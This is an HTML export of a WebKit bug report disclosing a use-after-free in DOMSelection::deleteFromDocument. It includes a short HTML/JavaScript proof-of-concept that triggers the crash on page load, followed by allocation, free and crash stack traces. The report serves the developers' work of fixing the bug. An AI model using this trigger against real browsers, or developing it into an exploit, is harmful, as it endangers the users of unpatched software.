<html>
    <head>
      <base href="https://bugs.webkit.org/" />
    </head>
    <body><table border="1" cellspacing="0" cellpadding="8">
        <tr>
          <th>Bug ID</th>
          <td><a class="bz_bug_link bz_status_NEW" title="NEW - WebCore::DOMSelection::deleteFromDocument use after free" href="https://bugs.webkit.org/show_bug.cgi?id=167232">167232</a>
          </td>
        </tr>

        <tr>
          <th>Summary</th>
          <td>WebCore::DOMSelection::deleteFromDocument use after free
          </td>
        </tr>

        <tr>
          <th>Classification</th>
          <td>Unclassified
          </td>
        </tr>

        <tr>
          <th>Product</th>
          <td>WebKit
          </td>
        </tr>

        <tr>
          <th>Version</th>
          <td>WebKit Local Build
          </td>
        </tr>

        <tr>
          <th>Hardware</th>
          <td>Unspecified
          </td>
        </tr>

        <tr>
          <th>OS</th>
          <td>Unspecified
          </td>
        </tr>

        <tr>
          <th>Status</th>
          <td>NEW
          </td>
        </tr>

        <tr>
          <th>Severity</th>
          <td>Normal
          </td>
        </tr>

        <tr>
          <th>Priority</th>
          <td>P2
          </td>
        </tr>

        <tr>
          <th>Component</th>
          <td>New Bugs
          </td>
        </tr>

        <tr>
          <th>Assignee</th>
          <td>webkit-unassigned&#64;lists.webkit.org
          </td>
        </tr>

        <tr>
          <th>Reporter</th>
          <td>yuanvi.cn&#64;gmail.com
          </td>
        </tr></table>
      <p>
        <div>
        <pre>Environment:
Windows 7 Ultimate 64-bit
WebKit local build at latest git commit d4c655ed0c90d076a473605d752c16adb321764e
page heap enabled for MiniBrowser.exe


PoC:
&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
&lt;script type=&quot;text/javascript&quot;&gt;
function start() {
    document.getElementById('input_0').disabled = true;
    document.getElementById('input_0').setRangeText(319, 193, 273);
    window.getSelection().extend(document.getElementById('input_0'));
    window.getSelection().deleteFromDocument();
}
&lt;/script&gt;
&lt;/head&gt;
&lt;body onload=&quot;start();&quot;&gt;
    &lt;input id=input_0 type=&quot;search&quot; name=&quot;fname&quot;&gt;&lt;br&gt;
&lt;/body&gt;
&lt;/html&gt;


Description:
Open the PoC file in MiniBrowser; it causes a UAF crash at {WebKit!WebCore::Node::renderBox [d:\webkit\source\webcore\dom\node.cpp &#64; 715]}. Note that this reduced PoC won't crash unless page heap is enabled.
I did not investigate this crash thoroughly, so I cannot determine if it is easily exploitable.


Stack backtrace:
RtlAllocateHeap record:
    WTF+00059cfc WTF!_malloc_base+0x38 [d:\th\minkernel\crts\ucrt\src\appcrt\heap\malloc_base.cpp &#64; 29]
    WTF+0000645b WTF!WTF::fastMalloc+0xb [d:\webkit\source\wtf\wtf\fastmalloc.cpp &#64; 182]
    WebKit+0078d25b WebKit!WebCore::SearchFieldCancelButtonElement::create+0xb [d:\webkit\source\webcore\html\shadow\textcontrolinnerelements.cpp &#64; 222]
    WebKit+007a9134 WebKit!WebCore::SearchInputType::createShadowSubtree+0xa4 [d:\webkit\source\webcore\html\searchinputtype.cpp &#64; 117]
    WebKit+00449701 WebKit!WebCore::HTMLInputElement::didAddUserAgentShadowRoot+0x11 [d:\webkit\source\webcore\html\htmlinputelement.cpp &#64; 146]
    WebKit+00126def WebKit!WebCore::Element::ensureUserAgentShadowRoot+0x4f [d:\webkit\source\webcore\dom\element.cpp &#64; 1857]
    WebKit+0046bb4f WebKit!WebCore::HTMLInputElement::initializeInputType+0xbf [d:\webkit\source\webcore\html\htmlinputelement.cpp &#64; 663]
    WebKit+001267d4 WebKit!WebCore::Element::parserSetAttributes+0xa4 [d:\webkit\source\webcore\dom\element.cpp &#64; 1528]
    WebKit+0089160a WebKit!WebCore::HTMLConstructionSite::createHTMLElementOrFindCustomElementInterface+0x20a [d:\webkit\source\webcore\html\parser\htmlconstructionsite.cpp &#64; 685]
    WebKit+0088f524 WebKit!WebCore::HTMLConstructionSite::insertSelfClosingHTMLElement+0x14 [d:\webkit\source\webcore\html\parser\htmlconstructionsite.cpp &#64; 507]
    WebKit+00894369 WebKit!WebCore::HTMLTreeBuilder::processStartTagForInBody+0x6a9 [d:\webkit\source\webcore\html\parser\htmltreebuilder.cpp &#64; 754]
    WebKit+00892e4b WebKit!WebCore::HTMLTreeBuilder::processStartTag+0x54b [d:\webkit\source\webcore\html\parser\htmltreebuilder.cpp &#64; 1095]
    WebKit+00892713 WebKit!WebCore::HTMLTreeBuilder::constructTree+0x23 [d:\webkit\source\webcore\html\parser\htmltreebuilder.cpp &#64; 356]
    WebKit+006e8684 WebKit!WebCore::HTMLDocumentParser::pumpTokenizerLoop+0x224 [d:\webkit\source\webcore\html\parser\htmldocumentparser.cpp &#64; 260]
    WebKit+006e839a WebKit!WebCore::HTMLDocumentParser::pumpTokenizer+0x6a [d:\webkit\source\webcore\html\parser\htmldocumentparser.cpp &#64; 284]
    WebKit+006e7ea4 WebKit!WebCore::HTMLDocumentParser::append+0x194 [d:\webkit\source\webcore\html\parser\htmldocumentparser.cpp &#64; 391]
    WebKit+00144c75 WebKit!WebCore::DecodedDataDocumentParser::appendBytes+0x65 [d:\webkit\source\webcore\dom\decodeddatadocumentparser.cpp &#64; 50]
    WebKit+006c0f5c WebKit!WebCore::DocumentWriter::addData+0x2c [d:\webkit\source\webcore\loader\documentwriter.cpp &#64; 254]
    WebKit+0019287d WebKit!WebCore::DocumentLoader::commitData+0x19d [d:\webkit\source\webcore\loader\documentloader.cpp &#64; 952]
    WebKit+000db050 WebKit!WebFrameLoaderClient::committedLoad+0x20 [d:\webkit\source\webkit\win\webcoresupport\webframeloaderclient.cpp &#64; 673]
    WebKit+001932d5 WebKit!WebCore::DocumentLoader::commitLoad+0x75 [d:\webkit\source\webcore\loader\documentloader.cpp &#64; 869]
    WebKit+0019432c WebKit!WebCore::DocumentLoader::dataReceived+0x7c [d:\webkit\source\webcore\loader\documentloader.cpp &#64; 984]
    WebKit+00193d7e WebKit!WebCore::DocumentLoader::dataReceived+0xe [d:\webkit\source\webcore\loader\documentloader.cpp &#64; 958]
    WebKit+00717a8a WebKit!WebCore::CachedRawResource::notifyClientsDataWasReceived+0x4a [d:\webkit\source\webcore\loader\cache\cachedrawresource.cpp &#64; 118]
    WebKit+007175ab WebKit!WebCore::CachedRawResource::addDataBuffer+0x9b [d:\webkit\source\webcore\loader\cache\cachedrawresource.cpp &#64; 69]
    WebKit+0019f30e WebKit!WebCore::SubresourceLoader::didReceiveDataOrBuffer+0x8e [d:\webkit\source\webcore\loader\subresourceloader.cpp &#64; 391]
    WebKit+0019ec68 WebKit!WebCore::SubresourceLoader::didReceiveBuffer+0x28 [d:\webkit\source\webcore\loader\subresourceloader.cpp &#64; 371]
    WebKit+00199e44 WebKit!WebCore::ResourceLoader::didReceiveBuffer+0x14 [d:\webkit\source\webcore\loader\resourceloader.cpp &#64; 635]
    WebKit+0071e9e3 WebKit!WebCore::SynchronousResourceHandleCFURLConnectionDelegate::didReceiveData+0x33 [d:\webkit\source\webcore\platform\network\cf\synchronousresourcehandlecfurlconnectiondelegate.cpp &#64; 185]
    WebKit+0071e581 WebKit!WebCore::ResourceHandleCFURLConnectionDelegate::didReceiveDataCallback+0x11 [d:\webkit\source\webcore\platform\network\cf\resourcehandlecfurlconnectiondelegate.cpp &#64; 84]
    CFNetwork+0015c5b9 CFNetwork!CFHTTPCookieCreateWithResponseHeaderFields+0xc579:

RtlFreeHeap record:
    kernel32+000114dd kernel32!HeapFree+0x14:
    WTF+000583e5 WTF!_free_base+0x1c [d:\th\minkernel\crts\ucrt\src\appcrt\heap\free_base.cpp &#64; 107]
    WebKit+00467bcd WebKit!WebCore::HTMLParamElement::`scalar deleting destructor'+0x1d:
    WebKit+0016b906 WebKit!WebCore::RangeBoundaryPoint::~RangeBoundaryPoint+0x36:
    WebKit+00138e6f WebKit!WebCore::Range::deleteContents+0x1f [d:\webkit\source\webcore\dom\range.cpp &#64; 470]
    WebKit+007620e3 WebKit!WebCore::DOMSelection::deleteFromDocument+0x63 [d:\webkit\source\webcore\page\domselection.cpp &#64; 378]
    WebKit+00983439 WebKit!WebCore::jsDOMSelectionPrototypeFunctionDeleteFromDocument+0x59 [d:\webkit\webkitbuild\release\derivedsources\webcore\jsdomselection.cpp &#64; 459]
    +0000347d Error(Call IDebugControl::ExecuteWide failed    HRESULT 0x80040205)
    JavaScriptCore+004f359b JavaScriptCore!llint_entry+0x4ac7 [D:\webkit\WebKitBuild\Release\DerivedSources\JavaScriptCore\LowLevelInterpreterWin.asm &#64; 7940]
    JavaScriptCore+004f359b JavaScriptCore!llint_entry+0x4ac7 [D:\webkit\WebKitBuild\Release\DerivedSources\JavaScriptCore\LowLevelInterpreterWin.asm &#64; 7940]
    JavaScriptCore+004ee93d JavaScriptCore!vmEntryToJavaScript+0x10d [D:\webkit\WebKitBuild\Release\DerivedSources\JavaScriptCore\LowLevelInterpreterWin.asm &#64; 114]
    JavaScriptCore+002769d7 JavaScriptCore!JSC::JITCode::execute+0x57 [d:\webkit\source\javascriptcore\jit\jitcode.cpp &#64; 81]
    JavaScriptCore+0025a061 JavaScriptCore!JSC::Interpreter::executeCall+0x191 [d:\webkit\source\javascriptcore\interpreter\interpreter.cpp &#64; 927]
    JavaScriptCore+0038284f JavaScriptCore!JSC::call+0x4f [d:\webkit\source\javascriptcore\runtime\calldata.cpp &#64; 47]
    JavaScriptCore+003829b9 JavaScriptCore!JSC::profiledCall+0x59 [d:\webkit\source\javascriptcore\runtime\calldata.cpp &#64; 65]
    WebKit+004f5942 WebKit!WebCore::JSMainThreadExecState::profiledCall+0x62 [d:\webkit\source\webcore\bindings\js\jsmainthreadexecstate.h &#64; 75]
    WebKit+004cbb1e WebKit!WebCore::JSEventListener::handleEvent+0x3ee [d:\webkit\source\webcore\bindings\js\jseventlistener.cpp &#64; 143]
    WebKit+0010289e WebKit!WebCore::EventTarget::fireEventListeners+0xfe [d:\webkit\source\webcore\dom\eventtarget.cpp &#64; 253]
    WebKit+001026f4 WebKit!WebCore::EventTarget::fireEventListeners+0xd4 [d:\webkit\source\webcore\dom\eventtarget.cpp &#64; 200]
    WebKit+002bcdb0 WebKit!WebCore::DOMWindow::dispatchEvent+0x100 [d:\webkit\source\webcore\page\domwindow.cpp &#64; 1994]
    WebKit+002bce83 WebKit!WebCore::DOMWindow::dispatchLoadEvent+0x83 [d:\webkit\source\webcore\page\domwindow.cpp &#64; 1952]
    WebKit+001137a8 WebKit!WebCore::Document::implicitClose+0x178 [d:\webkit\source\webcore\dom\document.cpp &#64; 2663]
    WebKit+002aedb4 WebKit!WebCore::FrameLoader::checkCompleted+0x84 [d:\webkit\source\webcore\loader\frameloader.cpp &#64; 825]
    WebKit+002aecef WebKit!WebCore::FrameLoader::finishedParsing+0x5f [d:\webkit\source\webcore\loader\frameloader.cpp &#64; 746]
    WebKit+00193dc6 WebKit!WebCore::DocumentLoader::notifyFinished+0x36 [d:\webkit\source\webcore\loader\documentloader.cpp &#64; 399]
    WebKit+00637e6c WebKit!WebCore::CachedResource::finishLoading+0xc [d:\webkit\source\webcore\loader\cache\cachedresource.cpp &#64; 328]
    WebKit+0019ed5a WebKit!WebCore::SubresourceLoader::didFinishLoading+0xca [d:\webkit\source\webcore\loader\subresourceloader.cpp &#64; 545]
    WebKit+00199e65 WebKit!WebCore::ResourceLoader::didFinishLoading+0x15 [d:\webkit\source\webcore\loader\resourceloader.cpp &#64; 641]
    WebKit+0071ea34 WebKit!WebCore::SynchronousResourceHandleCFURLConnectionDelegate::didFinishLoading+0x24 [d:\webkit\source\webcore\platform\network\cf\synchronousresourcehandlecfurlconnectiondelegate.cpp &#64; 193]
    CFNetwork+0015a2a1 CFNetwork!CFHTTPCookieCreateWithResponseHeaderFields+0xa261:

Crash:
    0046ec2c 6cb67aa6 WebKit!WebCore::Node::renderBox [d:\webkit\source\webcore\dom\node.cpp &#64; 715]
    0046ec4c 6cb65a1b WebKit!WebCore::RenderSearchField::computeControlLogicalHeight+0xb6 [d:\webkit\source\webcore\rendering\rendersearchfield.cpp &#64; 148]
    0046ec88 6ca8a533 WebKit!WebCore::RenderTextControl::computeLogicalHeight+0xab [d:\webkit\source\webcore\rendering\rendertextcontrol.cpp &#64; 104]
    0046ecbc 6cabb9de WebKit!WebCore::RenderBox::updateLogicalHeight+0x43 [d:\webkit\source\webcore\rendering\renderbox.cpp &#64; 2780]
    0046ecd4 6cabac37 WebKit!WebCore::RenderBlockFlow::updateLogicalHeight+0xe [d:\webkit\source\webcore\rendering\renderblockflow.cpp &#64; 3227]
    0046ed68 6cb66493 WebKit!WebCore::RenderBlockFlow::layoutBlock+0x457 [d:\webkit\source\webcore\rendering\renderblockflow.cpp &#64; 544]
    0046eda8 6cca124c WebKit!WebCore::RenderTextControlSingleLine::layout+0xf3 [d:\webkit\source\webcore\rendering\rendertextcontrolsingleline.cpp &#64; 119]
    0046ee10 6c8a22df WebKit!WebCore::FrameView::layout+0x5ac [d:\webkit\source\webcore\page\frameview.cpp &#64; 1492]
    0046ee30 6c8a237a WebKit!WebCore::Document::updateLayout+0xcf [d:\webkit\source\webcore\dom\document.cpp &#64; 1907]
    0046ee44 6c9bef1e WebKit!WebCore::Document::updateLayoutIgnorePendingStylesheets+0x7a [d:\webkit\source\webcore\dom\document.cpp &#64; 1941]
    0046eeb8 6c9bedc5 WebKit!WebCore::VisiblePosition::canonicalPosition+0x7e [d:\webkit\source\webcore\editing\visibleposition.cpp &#64; 562]
    0046eeec 6c9c23f5 WebKit!WebCore::VisiblePosition::init+0x25 [d:\webkit\source\webcore\editing\visibleposition.cpp &#64; 60]
    0046ef3c 6c9c227e WebKit!WebCore::VisibleSelection::setBaseAndExtentToDeepEquivalents+0x45 [d:\webkit\source\webcore\editing\visibleselection.cpp &#64; 250]
    0046ef58 6c9c1056 WebKit!WebCore::VisibleSelection::validate+0xe [d:\webkit\source\webcore\editing\visibleselection.cpp &#64; 422]
    0046ef68 6c9c4572 WebKit!WebCore::VisibleSelection::VisibleSelection+0xa6 [d:\webkit\source\webcore\editing\visibleselection.cpp &#64; 67]
    0046efe8 6cef1274 WebKit!WebCore::FrameSelection::moveTo+0x32 [d:\webkit\source\webcore\editing\frameselection.cpp &#64; 165]
    0046f02c 6cef212d WebKit!WebCore::DOMSelection::setBaseAndExtent+0x94 [d:\webkit\source\webcore\page\domselection.cpp &#64; 216]
    0046f068 6d113439 WebKit!WebCore::DOMSelection::deleteFromDocument+0xad [d:\webkit\source\webcore\page\domselection.cpp &#64; 379]
    0046f088 0a08347d WebKit!WebCore::jsDOMSelectionPrototypeFunctionDeleteFromDocument+0x59 [d:\webkit\webkitbuild\release\derivedsources\webcore\jsdomselection.cpp &#64; 459]</pre>
        </div>
      </p>
    </body>
</html>